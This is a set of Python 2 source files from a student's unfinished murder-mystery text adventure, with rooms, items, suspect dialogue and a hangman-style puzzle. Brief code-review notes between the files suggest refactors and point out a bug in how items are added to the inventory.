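The main loop in the file above routes movement through a long chain of elif comparisons against room names. A minimal table-driven sketch of the same dispatch, assuming the Room instances (police_office, study, garden, living_room, kitchen, bedroom, lab, front_yard) defined in that file; the rooms mapping and move() helper are names introduced here, not part of the repo.

rooms = {
    'police office': police_office,
    'study': study,
    'garden': garden,
    'living room': living_room,
    'kitchen': kitchen,
    'bedroom': bedroom,
    'lab': lab,
    'mansion': front_yard,
}

def move(command, node):
    # Unknown commands leave the player in the current room.
    return rooms.get(command, node)

With this table, adding a new room means adding one dictionary entry instead of another elif branch.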
{
"alpha_fraction": 0.643576443195343,
"alphanum_fraction": 0.6454073786735535,
"avg_line_length": 29.064220428466797,
"blob_id": "47ba1ee59e973f7c3e6b44147624f191f06a6f92",
"content_id": "d802c9018ca1945ee0ced46ea8acf2ec11f010cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3277,
"license_type": "no_license",
"max_line_length": 185,
"num_lines": 109,
"path": "/CarolineRooms.py",
"repo_name": "SumanjitGill/ChooseYourAdventureStory",
"src_encoding": "UTF-8",
"text": "class Item:\n def __init__(self, name, description):\n self.name = name\n self.description = description\n \n def examine(self):\n print self.name\n print self.description\n \n def pick_up(self, Inventory):\n Inventory.inventory.append(Item)\n Inventory.inventory_two.append(self.name)\n print 'You have picked up: %s.' %self.name\n \n def give_item(self):\n Inventory.inventory.remove(Item)\n Inventory.inventory_two.remove(self.name)\n\ncell_phone = Item('Nicole\\'s Cell Phone', 'There is a passcode on this phone but\\\nthere must be some good evidence on here; Why not take it to Gabi?')\n\nteacup = Item('Teacup', 'This broken cup can be taken to Gabi. Nicole drinks tea\\\nevery morning... any ideas?')\n\nbody = Item('Nicole\\'s Body', 'There are no trauma signs; Could she have been killed\\\nwith poison?')\n\npaperwork = Item('Financial Paperwork', 'This paperwork lets you know that Sakshi\\\nand Nicole were business rivals.')\n\n#To be updated later\n\ntea_grounds = Item('Tea Grounds', '')\n\nmorphine_capsules = Item('Morphine Capsules', '')\n\nchair = Item('Chair', '')\n\npen = Item('Sakshi\\'s Pen', '')\n\nwater_glass = Item('Sakshi\\'s Glass', '')\n\nwater_glass_2 = Item('','')\n\nvase = Item('','')\n\nfridge = Item('','')\n\nvase_2 = Item('','')\n\npen_2 = Item('','')\n\ndesk = Item('','')\n\nwrapper = Item('','')\n\nclarinet = Item('','')\n\nbench = Item('','')\n\nnews_clipping = Item('','')\n\npill_bottle = Item('','')\n\nclass Room:\n def __init__(self, name, description, item, item_two, item_three, item_four):\n self.name = name\n self.description = description\n self.item = item\n self.item_two = item_two\n self.item_three = item_three\n self.item_four = item_four\n \n def see_item(self, cosa):\n print cosa.description\n \n def search_room(self):\n print \n \npolice_office = Room('Police Chief Ativa\\'s Office', 'This is your father\\'s police \\\noffice. He is sitting at his desk doing some paperwork.', None, None, None, None)\n\nstudy = Room('The Study', 'This study is where Sakshi stays.', paperwork, chair, pen, water_glass)\n\ngarden = Room('Garden', 'In this garden is Andres.', wrapper, clarinet, bench, news_clipping)\n\nliving_room = Room('Living Room', 'This room is where Bree resides.', vase_2, pen_2, desk, None)\n\nkitchen = Room('Kitchen', 'This kitchen is where Leng is located.', tea_grounds, water_glass_2, vase, fridge)\n\nbedroom = Room('Nicole\\'s Bedroom', 'This is the crime scene. A woman\\'s body lies \\\nnext to the bed, a splattered tea cup by her side. You may examine the body, pick up the teacup, \\\nand look under the bed.', cell_phone, teacup, body, morphine_capsules)\n\nlab = Room('Gabi\\'s Lab', 'This lab is where you can always find Gabi. Come here \\\nwhen you need some evidence examined!', None, None, None, None)\n\nfront_yard = Room('Mansion\\'s Front Yard', 'A lush green lawn spreads like a blanket in front of a massive and ornately structured mansion, the view only marred by splashes of trash.\\n\\\nFrom here you can go to:\\n\\\n - study\\n\\\n - kitchen\\n\\\n - bedroom\\n\\\n - living room\\n\\\n - garden\\n\\\n - police office\\n\\\n - lab', pill_bottle, None, None, None)\n\nglobal node \nnode = police_office "
},
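In the Item class of CarolineRooms.py above, pick_up appends the class object Item to the inventory rather than the instance being picked up, so a later membership test such as paperwork in user_inventory.inventory can never match the actual object; give_item has the same problem and additionally refers to an Inventory name it never receives. A minimal corrected sketch of the pattern, not the repo's code:

class Inventory:
    def __init__(self):
        self.inventory = []
        self.inventory_two = []

class Item:
    def __init__(self, name, description):
        self.name = name
        self.description = description

    def pick_up(self, inventory):
        # Store the instance itself, not the Item class, so membership
        # tests like `paperwork in user_inventory.inventory` succeed.
        inventory.inventory.append(self)
        inventory.inventory_two.append(self.name)

    def give_item(self, inventory):
        # Take the inventory as a parameter, mirroring pick_up.
        inventory.inventory.remove(self)
        inventory.inventory_two.remove(self.name)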
{
"alpha_fraction": 0.662409782409668,
"alphanum_fraction": 0.664075493812561,
"avg_line_length": 39.022220611572266,
"blob_id": "ca1f07ff79f4614ea787f8faaa372a2f400cf8dd",
"content_id": "0cd0ddf1e876cda609a3b0f79d40e4139fd427a9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1801,
"license_type": "no_license",
"max_line_length": 185,
"num_lines": 45,
"path": "/Caroline Rooms.py",
"repo_name": "SumanjitGill/ChooseYourAdventureStory",
"src_encoding": "UTF-8",
"text": "class Room:\n def __init__(self, name, description, item, item_two, item_three, item_four):\n self.name = name\n self.description = description\n self.item = item\n self.item_two = item_two\n self.item_three = item_three\n self.item_four = item_four\n \n def see_item(self, cosa):\n print cosa.description\n \n def search_room(self):\n print \n \npolice_office = Room('Police Chief Ativa\\'s Office', 'This is your father\\'s police \\\noffice. He is sitting at his desk doing some paperwork.', None, None, None, None)\n\nstudy = Room('The Study', 'This study is where Sakshi stays.', paperwork, chair, pen, water_glass)\n\ngarden = Room('Garden', 'In this garden is Andres.', wrapper, clarinet, bench, news_clipping)\n\nliving_room = Room('Living Room', 'This room is where Bree resides.', vase_2, pen_2, desk, None)\n\nkitchen = Room('Kitchen', 'This kitchen is where Leng is located.', tea_grounds, water_glass_2, vase, fridge)\n\nbedroom = Room('Nicole\\'s Bedroom', 'This is the crime scene. A woman\\'s body lies \\\nnext to the bed, a splattered tea cup by her side. You may examine the body, pick up the teacup, \\\nand look under the bed.', cell_phone, teacup, body, morphine_capsules)\n\nlab = Room('Gabi\\'s Lab', 'This lab is where you can always find Gabi. Come here \\\nwhen you need some evidence examined!', None, None, None, None)\n\nfront_yard = Room('Mansion\\'s Front Yard', 'A lush green lawn spreads like a blanket in front of a massive and ornately structured mansion, the view only marred by splashes of trash.\\n\\\nFrom here you can go to:\\n\\\n - study\\n\\\n - kitchen\\n\\\n - bedroom\\n\\\n - living room\\n\\\n - garden\\n\\\n - police office\\n\\\n - lab', pill_bottle, None, None, None)\n\nglobal node \nnode = police_office "
},
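The Room class above reserves four fixed slots (item, item_two, item_three, item_four) and pads the unused ones with None. A sketch of an alternative that keeps a single item list, so a room can hold any number of items without None padding; this is a variant, not the repo's class:

class Room:
    def __init__(self, name, description, items=None):
        self.name = name
        self.description = description
        # One list replaces the four fixed item slots.
        self.items = items if items is not None else []

    def see_items(self):
        for thing in self.items:
            print(thing.description)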
{
"alpha_fraction": 0.5449344515800476,
"alphanum_fraction": 0.5510131120681763,
"avg_line_length": 31.523256301879883,
"blob_id": "91a18a4ab885ca2c0756712e3061f19b6f5c41e4",
"content_id": "516a5d65baf702a31fb30ba6f346cc66fc7ec952",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8390,
"license_type": "no_license",
"max_line_length": 166,
"num_lines": 258,
"path": "/CS10-SumanjitGill-Caroline.py",
"repo_name": "SumanjitGill/ChooseYourAdventureStory",
"src_encoding": "UTF-8",
"text": "import sys\nimport random\n\nclass Inventory:\n def __init__(self):\n self.inventory = []\n self.inventory_two = []\n \n #def view inventory (inventory_two)\n def view_inventory(self):\n print self.inventory_two\n #def examine item (inventory)\n def examine_item(self, obj):\n if obj not in self.inventory:\n print 'You can\\'t examine this object because it is not in your\\\n inventory. Try an object you have.'\n else:\n print obj.name\n print obj.description\n \nuser_inventory = Inventory()\n\n#-------------------------------------------------------------------------------\n \nclass Item:\n def __init__(self, name, description):\n self.name = name\n self.description = description\n \n def examine(self):\n print self.name\n print self.description\n \n def pick_up(self, Inventory):\n Inventory.inventory.append(Item)\n Inventory.inventory_two.append(self.name)\n print 'You have picked up: %s.' %self.name\n \n def give_item(self):\n Inventory.inventory.remove(Item)\n Inventory.inventory_two.remove(self.name)\n\naxe = Item('Axe', 'Pointy')\n\n#-------------------------------------------------------------------------------\n\n#Storyline\nclass Character():\n def __init__(self, name, full_name, age, status, background, location):\n self.name = name\n self.full_name = full_name\n self.age = age\n self.status = status\n self.background = background\n self.location = location\n \n def stats(self):\n print self.full_name\n print self.age\n print self.status\n print self.background\n \n def locate(character):\n print character.name+ 'is located in: %s' %character.location\n \n#Caroline = Character('Caroline','Karolina \"Caroline\" Ativa', 22, 'Alive', '', 'You are her... So wherever you are that\\'s where she is.')\n#Liam = Character('Liam','Liam Youngblood', 23, 'Alive', '', 'He\\'s always by your side.')\n#Gabriela = Character('Gabi','Gabriela Solis',18, 'Alive', '', 'She\\'s found in the lab at the police office.')\n#Andres = Character('Andres','Andres Leal', 30, 'Alive; Suspect', '', 'He\\'s found in the garden.')\n#Bree = Character('Bree','Breanna \"Bree\" Scholtz', 35, 'Alive; Suspect', 'She works as Leng\\'s maid around the mansion.', 'She\\'s found in the living room.')\n#Nicole = Character('Nicole','Nicole Laurenya', 31, 'Dead; Victim', 'She was a rich heiress of Twilight Grove.', 'Her corpse is found in her bedroom.')\n#Liev = Character('Liev','Liev Ativa', 45, 'Alive', 'He is your father and the police chief who assigned you to this investigation.', 'He is found in the police office.')\n#Sakshi = Character('Sakshi','Sakshi Goenka', 32, 'Alive; Suspect','Sakshi is a business tycoon and is Leng\\'s girlfriend.', 'She is found in the study.')\n#Leng = Character('Leng','Leng Li', 33, 'Alive; Suspect', 'He is a renowned chef and is Sakshi\\'s lover.', 'He is found in the kitchen.')\n\n#-------------------------------------------------------------------------------\n\n#def help():\n# user_q = raw_input('What do you need help with?\\n')\n\n#-------------------------------------------------------------------------------\n \n#For Version 2: \n'''class Notebook:\n def __init__(self):\n self.notebook = []\n \n def write_in_notebook(self):\n user_note = raw_input('What would you like to write in your notebook?')\n self.notebook.append(user_note)\n \n def show_entry_amount(self):\n if len(self.notebook) ==1:\n print 'You have 1 entry.'\n elif len(self.notebook) ==0:\n print 'You don\\'t have any entries.'\n else:\n print 'You have', len(self.notebook),'entries.'\n \n def read_entry(self):\n for 
i in enumerate(self.notebook):\n print i\n user_entry_choice = raw_input('Which entry would you like to read?')\n try:\n path = [int(user_entry_choice)]\n print self.notebook[path]\n except:\n print 'Invalid Number. Try a valid number.'\n \nyour_notebook = Notebook()\n#4691 E Harvard Ave Fresno, CA 93703-2075\n'''\n\n#-------------------------------------------------------------------------------\n\nclass Dialogue:\n def __init__(self, dialogue):\n self.dialogue = dialogue\n \n def say(self,char):\n print char.name+':','\"'+self.dialogue+'\"'\n \nhello = Dialogue('Hello')\n\n#-------------------------------------------------------------------------------\n\n#Rooms\n\n#Have three parameters in __init__ for the item name\n#Refer to it as you did with dialogue\n \nclass Room:\n def __init__(self, name, description, item, item_two, item_three):\n self.name = name\n self.description = description\n self.item = item\n self.item_two = item_two\n self.item_three = item_three\n \n def see_item(self, cosa):\n print cosa.description\n \npolice_office = Room('Police Chief Ativa\\'s Office', 'This office.', None, None, None)\nstudy = Room('The Study', 'This study.', None, None, None)\ngarden = Room('Garden', 'This garden.', None, None, None)\nliving_room = Room('Living Room', 'This room.', None, None, None)\nkitchen = Room('Kitchen', 'This kitchen.', None, None, None)\nbedroom = Room('Nicole\\'s Bedroom', 'This is the crime scene.', None, None, None)\nlab = Room('Gabi\\'s Room', 'This lab.', None, None, None)\nfront_yard = Room('Front Yard', 'This front yard.', None, None, None)\n\nglobal node \nnode = living_room \n''' \nwhile True:\n print node.name\n print node.description\n user_command = raw_input('> ')\n if user_command in ['q', 'quit', 'exit']:\n sys.exit(0)\n elif user_command == 'police office':\n node = police_office\n elif user_command == 'study':\n node = study\n elif user_command == 'garden':\n node = garden\n elif user_command == 'living room':\n node = living_room\n elif user_command == 'kitchen':\n node = kitchen\n elif user_command == 'bedroom':\n node = bedroom\n elif user_command == 'lab':\n node = lab\n elif user_command == 'front yard':\n node = front_yard\n '''\nbathroom = Room('Bathroom', 'This is where you shower and excrete your junk.', axe, None, None)\n\n#-------------------------------------------------------------------------------\n \n#Do dialogue in order this by continously calling the dialogue 'say' function\n#Progress stories this way\n\n'''while True:\n user_response = raw_input('> ')\n if user_response in ['q','quit','exit']:\n sys.exit(0)\n '''\n \n#Win Conditions as a class to make sure that the person accomplished everything \n#before winning\n#Series of red flags/conditionals to make sure that the tasks are completed \n \n\n\n#Hangman\n\n#Numerical Riddle (1982)\n\n#Riddle\n\n#Hangman\n\n#Riddle\n\n#Numerical Riddle (Passcode = (0129))\n #- Tells you which digits you got correct and which you didn't\n #- \n \n#-------------------------------------------------------------------------------\n \n'''\n#Setting up variables to be called on later\nlife = 5\nbank = [\"zero one twenty nine\"]\nword = random.choice(bank)\n\nletters_left = list(set(word)) #creating a list of letters in word\nif ' ' in word:\n letters_left.remove(' ') #removing the space if there is one\n \n\nuser_guesses = [] #More variables\nwrong_answers = 0\nhidden_phrase = []\nfoo = list(word) \n\nprint (\"You have five chances right now.\")\n\nwhile life > 0: #The dreaded while loop\n \n\n\n for 
letter in word: \n hidden_phrase = [] \n if letter in user_guesses:\n print letter,\n elif letter == ' ':\n print letter,\n else:\n print ('_'),\n \n \n current_guess = raw_input(\"Guess a letter: \") #This takes in raw input\n user_guesses.append(current_guess)\n if current_guess in word: #If guess in word, remove from letters_left\n letters_left.remove(current_guess) \n #print letters_left\n print user_guesses #Prints guesses so far\n if current_guess not in word: #If you guess incorrectly\n life -= 1\n wrong_answers += 1\n print (\"Your life count: \") + str(life)\n \n if len(letters_left) == 0:\n gaby.say()\n '''"
},
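The hangman draft commented out at the end of the file above (and the live copies elsewhere in the repo) calls letters_left.remove(current_guess) every time a correct letter is entered, so repeating a correct guess raises ValueError because the letter was already removed. A minimal guard, wrapped in a hypothetical helper so it runs standalone:

def apply_guess(word, letters_left, user_guesses, life, guess):
    # Ignore repeated guesses so a correct letter entered twice does not
    # crash on letters_left.remove(); only fresh wrong guesses cost a life.
    if guess in user_guesses:
        return life
    user_guesses.append(guess)
    if guess in letters_left:
        letters_left.remove(guess)
    elif guess not in word:
        life -= 1
    return life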
{
"alpha_fraction": 0.5985155701637268,
"alphanum_fraction": 0.6036677360534668,
"avg_line_length": 37.47105026245117,
"blob_id": "1945b79a9b3e56af501d48bde32a828b82426139",
"content_id": "bf8fe0d7528bc920308ec1edd2ee5a70c5f25a1d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 39235,
"license_type": "no_license",
"max_line_length": 608,
"num_lines": 1019,
"path": "/Caroline GUIIII.py",
"repo_name": "SumanjitGill/ChooseYourAdventureStory",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n#WARNING: GAME UNFINISHED\n#More involvement in game :) ~ puzzles and more functions to search the rooms\n#from _____ import *\n\nimport sys\nimport random\nimport time\nimport pickle\n\nclass Inventory:\n def __init__(self):\n self.inventory = []\n self.inventory_two = []\n \n #def view inventory (inventory_two)\n def view_inventory(self):\n print self.inventory_two\n #def examine item (inventory)\n def examine_item(self, obj):\n if obj not in self.inventory:\n print 'You can\\'t examine this object because it is not in your\\\n inventory. Try an object you have.'\n else:\n print obj.name\n print obj.description\n \nuser_inventory = Inventory()\nhang = Inventory()\n\n#-------------------------------------------------------------------------------\n\nclass Item:\n def __init__(self, name, description):\n self.name = name\n self.description = description\n \n def examine(self):\n print self.name\n print self.description\n \n def pick_up(self, Inventory):\n Inventory.inventory.append(Item)\n Inventory.inventory_two.append(self.name)\n print 'You have picked up: %s.' %self.name\n \n def give_item(self):\n Inventory.inventory.remove(Item)\n Inventory.inventory_two.remove(self.name)\n\ncell_phone = Item('Nicole\\'s Cell Phone', 'There is a passcode on this phone but\\\nthere must be some good evidence on here; Why not take it to Gabi?')\n\nteacup = Item('Teacup', 'This broken cup can be taken to Gabi. Nicole drinks tea\\\nevery morning... any ideas?')\n\nbody = Item('Nicole\\'s Body', 'There are no trauma signs; Could she have been killed\\\nwith poison?')\n\npaperwork = Item('Financial Paperwork', 'This paperwork lets you know that Sakshi\\\nand Nicole were business rivals.')\n\n#To be updated later\n\npic = ''\n\npic_2 = ''\n\npic_3 = ''\n\ntea_grounds = Item('Tea Grounds', '')\n\nmorphine_capsules = Item('Morphine Capsules', '')\n\nchair = Item('Chair', '')\n\npen = Item('Sakshi\\'s Pen', '')\n\nwater_glass = Item('Sakshi\\'s Gllass', '')\n\nwater_glass_2 = Item('','')\n\nvase = Item('','')\n\nfridge = Item('','')\n\nvase_2 = Item('','')\n\npen_2 = Item('','')\n\ndesk = Item('','')\n\nwrapper = Item('','')\n\nclarinet = Item('','')\n\nbench = Item('','')\n\nnews_clipping = Item('','')\n\npill_bottle = Item('','')\n\n#-------------------------------------------------------------------------------\n\n#Storyline\nclass Character():\n def __init__(self, name, full_name, age, status, background, location):\n self.name = name\n self.full_name = full_name\n self.age = age\n self.status = status\n self.background = background\n self.location = location\n \n def stats(self):\n print self.full_name\n print self.age\n print self.status\n print self.background\n'''\n \n def locate(character):\n print character.name+ 'is located in: %s' %character.location\n '''\n \nCaroline = Character('Caroline','Karolina \"Caroline\" Ativa', 22, 'Alive', 'Caroline is a dedicated police officer and takes her tasks seriously.', 'You are her... 
So wherever you are that\\'s where she is.')\nLiam = Character('Liam','Liam Youngblood', 23, 'Alive', 'Liam is your fellow officer and is very charasmatic and likes to make light of situations to keep your spirits up.', 'He\\'s always by your side.')\nGabriela = Character('Gabi','Gabriella Solis',18, 'Alive', 'Gabi is a technology and science geek and loves to invent new things; she\\'s the scientific aide to your father\\'s police department.', 'She\\'s found in the lab at the police office.')\nAndres = Character('Andres','Andres Leal', 30, 'Alive; Suspect', 'Andres is a calm doctor who loves to play his clarinet.', 'He\\'s found in the garden.')\nBree = Character('Bree','Breanna \"Bree\" Scholtz', 35, 'Alive; Suspect', 'She works as Leng\\'s maid around the mansion.', 'She\\'s found in the living room.')\nNicole = Character('Nicole','Nicole Laurenya', 31, 'Dead; Victim', 'She was a rich heiress of Twilight Grove.', 'Her corpse is found in her bedroom.')\nLiev = Character('Liev','Liev Ativa', 45, 'Alive', 'He is your father and the police chief who assigned you to this investigation.', 'He is found in the police office.')\nSakshi = Character('Sakshi','Sakshi Goenka', 32, 'Alive; Suspect','Sakshi is a business tycoon and is Leng\\'s girlfriend.', 'She is found in the study.')\nLeng = Character('Leng','Leng Li', 33, 'Alive; Suspect', 'He is a renowned chef and is Sakshi\\'s lover.', 'He is found in the kitchen.')\n\n#-------------------------------------------------------------------------------\n\n#def help():\n# user_q = raw_input('What do you need help with?\\n')\n\n#-------------------------------------------------------------------------------\n \n#For Version 2: \n'''class Notebook:\n def __init__(self):\n self.notebook = []\n \n def write_in_notebook(self):\n user_note = raw_input('What would you like to write in your notebook?')\n self.notebook.append(user_note)\n \n def show_entry_amount(self):\n if len(self.notebook) ==1:\n print 'You have 1 entry.'\n elif len(self.notebook) ==0:\n print 'You don\\'t have any entries.'\n else:\n print 'You have', len(self.notebook),'entries.'\n \n def read_entry(self):\n for i in enumerate(self.notebook):\n print i\n user_entry_choice = raw_input('Which entry would you like to read?')\n try:\n path = [int(user_entry_choice)]\n print self.notebook[path]\n except:\n print 'Invalid Number. Try a valid number.'\n \nyour_notebook = Notebook()\n#4691 E Harvard Ave Fresno, CA 93703-2075\n'''\n\n#-------------------------------------------------------------------------------\n\n#class Dialogue:\n # def __init__(self, dialogue):\n # self.dialogue = dialogue\n # \n #def say(self,char):\n # print char.name+':','\"'+self.dialogue+'\"'\n \nscene_1 = 'Chief: \"Chief Ativa speaking. Yes, sir. Yes, sir. I understand. Yes, sir, I will make sure it is taken care of.\"\\n\\\n\\n\\\nThe Chief hangs up the phone and looks at a picture with him and his daughter (you) on the day she (you) graduated from the police academy.\\n\\\n\\n\\\nYou are sitting outside at your desk with paperwork, you partner Liam talking your ear off.\\n\\\n\\n\\\nLiam: \"And that\\'s when I said, I don\\'t care how much money he has. It\\'s all about how his --\" \\n\\\n\\n\\\nChief: \"Ativa and Youngblood, get in here.\"\\n\\\n\\n\\\nLiam: \"Pants. And yes, sir! 
Your dad seems grumpy.\"\\n\\\n\\n\\\nYou: \"Probably saw your face too early in the morning.\"\\n\\\n\\n\\\nLiam: \"Ouch, that hurts.\"\\n\\\n\\n\\\nYou both enter the Chief\\'s office.\"\\n\\\n\\n\\\nChief: \"There\\'s been a highly suspicious death.\"\\n\\\n\\n\\\nLiam: \"Naturally, we are the homicide division.\"\\n\\\n\\n\\\n\\n\\\nYou shoot Liam a look, fighting the urge to roll your eyes, which the Chief does do.\\n\\\n\\n\\\nChief: \"Youngblood, I don\\'t want to hear another word until I am done briefing you. There\\'s been a death in Twilight Grove.\"\\n\\\n\\n\\\nLiam whistles, getting another irritated look from the Chief. You know what Liam meant. Twilight Grove is a very affluent neighborhood.\\n\\\n\\n\\\nChief: \"As you can understand, it\\'s a high profile case and the Mayor is concerned. The crime scene is quite isolated so it has been kept quiet. \\n\\\nI want both of you to head the case and wrap it up. Come talk to me as soon as you\\'ve solved it.\"\\n\\\n\\n\\\nYou exit the Chief\\'s office with Liam.\\n'\n\nchief = '\\nChief: \"What are you waiting for? Finish up the case!\"'\n\ngabi = '\\nGabi: \"No evidence, no entry, no Gabi. Come back later you lovable bozos.\"'\n\nscene_2 = '\\nLiam: \"That is one huge—\"\\n\\\n\\n\\\nYou: \"According to the case files, it belongs to a guy named Leng Li. He\\'s a renowned chef.\"\\n\\\n\\n\\\nLiam: \"If he\\'s so rich, why can\\'t he buy a trash can? There\\'s so much junk around here.\"\\n\\\n\\n\\\nYou: \"Oh, right, the garbage strike. Did you read about how --\" \\n\\\n\\n\\\nLiam: \"No, I didn\\'t. Well, I can take solace in the fact that my house is cleaner than a rich guy\\'s.\" \\n\\\n\\n\\\nYou: \"And there\\'s no dead body in yours. I hope.\"'\n\nscene_3 = '\\nLiam: \"Pretty girl. At least she didn\\'t die in the \"living\" room, eh?\"\\n\\\n\\n\\\nYou: \"This is Nicole Laurenya, a rich heiress well-known for her social life.\"\\n\\\n\\n\\\nLiam: \"Just going to ignore my joke?\"\\n\\\n\\n\\\nYou: \"Yup.\"'\n\nexamine = '\\nYou: \"I don\\'t see any signs of trauma and I hardly think it\\'s natural causes. It could be poison…\"\\n\\\n\\n\\\nLiam: \"The killer\\'s probably a woman then. Poison is usually used by women.\"\\n\\\n\\n\\\nYou: \"Didn\\'t you say you would kill someone with cyanide if you wanted to make a clean getaway?\"\\n\\\n\\n\\\nLiam: \"I\\'m special. Anyways, let\\'s let the coroner take a look. Gabriella will tell us more.\"'\n\ncup = '\\nYou: \"Gabriella can also tell us more about this.\"\\n\\\n\\n\\\nLiam: \"Now I\\'m thirsty.\"\\n\\\n\\n\\\nYou: \"You want a sip?\"\\n\\\n\\n\\\nLiam: \"Ha, ha, hilarious.\"'\n\nphone = 'You: \"Found something.\"\\n\\\n\\n\\\nLiam: \"The victim\\'s cell phone. Nice.\"\\n\\\n\\n\\\nYou: \"It has a passcode but I\\'m sure we can figure it out later.\"'\n\nsakshi_1 = 'You enter the study to see a woman sitting at the desk and writing with a fancy pen, her expression clearly upset. \\n\\\n\\n\\\nYou: \"Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\"\\n\\\n\\n\\\nWoman: \"I\\'m Sakshi Goenka.\"\\n\\\n\\n\\\nLiam: \"The business tycoon?\"\\n\\\n\\n\\\nSakshi: \"The very same.\"\\n\\\n\\n\\\nLiam: \"And how were you related to the victim?\"\\n\\\n\\n\\\nSakshi: \"Her name was Nicole. You can at least say her name. And she was my best friend.\" \\n\\\n\\n\\\nYou: \"I\\'m so sorry for your loss. Can you tell us what happened?\"\\n\\\n\\n\\\nSakshi: \"I don’t know. 
My boyfriend, Leng, invited our friends over for a few days so we can spend some time together and…all I know is Nicole was alive last night and this morning, when she didn\\'t come down for breakfast, the maid went to check on her and she was dead. Just like that. She shouldn\\'t be. Nicole was the sweetest, funniest, most fun person you could know.\"\\n\\\n\\n\\\nYou: \"Thank you for your time. We\\'ll be back later if we have more questions.\"'\n\nleng_1 = '\\nYou enter the kitchen to see a man pouring himself a glass of water, looking lost.\\n\\\n\\n\\\nYou: \"Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\"\\n\\\n\\n\\\nMan: \"My name is Leng, Leng Li.\" \\n\\\n\\n\\\nLiam: \"And how were you related to the victim?\"\\n\\\n\\n\\\nLeng: \"Nicole is, was, one of my best friends. She, my girlfriend Sakshi, Andres, and I grew up together.\"\\n\\\n\\n\\\nYou: \"I\\'m so sorry for your loss. Can you tell us what happened?\"\\n\\\n\\n\\\nLeng: \"All of us finally had some time off and so I invited everyone to stay for a few days. I was looking forward to it. I can\\'t believe the nightmare it has become. Everything was so normal and nostalgic. Nicole was having a blast the entire time, we all were. This morning…we all came for breakfast but Nicole wasn\\'t there. I told Bree, my maid, to call her. She screamed so loud and we all ran up there and saw…she was dead. I still can\\'t believe she\\'s really gone.\"\\n\\\n\\n\\\nYou: \"Thank you for your time. We\\'ll be back later if we have more questions.\"'\n\nbree_1 = '\\nYou enter the living room to see a woman nervously arranging a vase of flowers, her face disturbed.\\n\\\n\\n\\\nYou: \"Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\\n\\\n\\n\\\nWoman: \"My name is Bree Scholtz.\"\\n\\\n\\n\\\nLiam: \"And how were you related to the victim?\"\\n\\\n\\n\\\nBree: \"I\\'m not. I mean, I\\'m Mr. Li\\'s maid so I only knew Ms. Nicole in passing.\"\\n\\\n\\n\\\nYou: \"I understand. Can you tell us what happened? You found the body, correct?\"\\n\\\n\\n\\\nBree: \"Yes, it was horrible. Last night, Ms. Nicole had asked me to bring her a cup of the special blend that Mr. Li had set aside for her in the morning at precisely 8 a.m. Unfortunately, I didn\\'t get up there until about 8:30 a.m. and Ms. Nicole was in the shower. I helped Mr. Li in the kitchen until breakfast was to be served. Mr. Li sent me upstairs when Ms. Nicole didn\\'t come down. I went to her room and opened the door to see her lying on the ground, completely still. I screamed and they all came running up. I don\\'t remember who said she was dead; I was in shock. It was a truly horrifying experience.\"\\n\\\n\\n\\\nLiam: \"So you were also the last person to see the victim alive?\"\\n\\\n\\n\\\nBree: \"I suppose so. Ms. Nicole was in the shower when I went there so I never saw her exactly.\"\\n\\\n\\n\\\nYou: \"Thank you for your time. We\\'ll be back later if we have more questions.\"'\n\nandres_1 = '\\nYou enter the garden to see a man sitting in the garden, mournfully playing a tune on his clarinet. \\n\\\n\\n\\\nYou: \"Hello. I am Detective Ativa and this is my partner, Detective Youngblood. We need to ask you some questions. What is your name?\"\\n\\\n\\n\\\nMan: \"I\\'m Dr. Andres Leal.\" \\n\\\n\\n\\\nLiam: \"And how were you related to the victim?\"\\n\\\n\\n\\\nAndres: \"Nicole was one of my closest friends. 
Sakshi, Leng, Nicole, and I have been best friends since as long as I can remember.\"\\n\\\n\\n\\\nYou: \"I\\'m so sorry for your loss. Can you tell us what happened?\"\\n\\\n\\n\\\nAndres: \"Leng had invited all of us for the week and it was going great. It was nice to all hang out again. This morning, the maid went up to call Nicole down for breakfast and she just started screaming. We all ran up there and Nicole was lying on the floor. I went over to her and checked if there was a pulse but I couldn\\'t find one and she wasn\\'t breathing. I tried to do CPR but…we were too late.\"\\n\\\n\\n\\\nYou: \"Thank you for your time. We\\'ll be back later if we have more questions.\"'\n\ngabi_2 = '\\nYou enter the lab to see Gabi typing quickly on a computer.\\n\\\n\\n\\\nYou: \"Hey, Gabriella.\"\\n\\\n\\n\\\nGabriella: \"Karolina, Liam, my two fav idiots.\"\\n\\\n\\n\\\nLiam: \"What\\'s the good word, Gabi?\"\\n\\\n\\n\\\nGabriella: \"First, let me say thank you for such a sweet case. I mean, Twilight Grove? Money City!\"\\n\\\n\\n\\\nLiam: \"You\\'re telling me. The mansion is so huge, I keep getting confused which room is where.\"\\n\\\n\\n\\\nYou: *clear throat* \"Guys, focus.\" \\n\\\n\\n\\\nGabriella: \"Right, you\\'re right. I\\'m still waiting on the coroner to send me the full report but what I can tell you is that this tea cup contains poison.\"\\n\\\n\\n\\\nLiam: \"What kind of poison?\"\\n\\\n\\n\\\nGabriella: \"I don\\'t know yet. And before you ask, I am working on it and the cellphone. You\\'ll have to come back later. Why don\\'t you two go back and snoop around. Make yourselves useful and bring some more goodies!\"'\n\ngabi_3 = '\\nGabi: \"Got more? No? I\\'m not a miracle worker; bring me something I can work my magic on.\"'\n\nriddle_win = 'You find some financial paperwork.\\n\\\nYou: \"This is interesting.\"\\n\\\nLiam: \"What is it?\"\\n\\\nYou: \"Looks like Sakshi and Nicole may have been best friends but their companies are business rivals. We need to have another chat--\"\\n\\\nAt this moment, Sakshi walks in.\\n\\\nSakshi: \"What are you two doing here?\"\\n'\n\nsofa = 'You: \"A…a-choo!\"\\n\\\nLiam: \"That maid must be doing a sub-par job.\"\\n'\n\nbookshelf = 'You: \"Wow, he has a great collection.\"\\n\\\nLiam: \"But nothing useful for the case.\"\\n'\n\nsakshi_2 = 'You: \"Sakshi, it looks like Nicole may have been poisoned.\"\\n\\\nSakshi: \"That\\'s horrible. Was it her tea? That\\'s the first thing she drinks every morning.\"\\n\\\nLiam: \"So you knew about 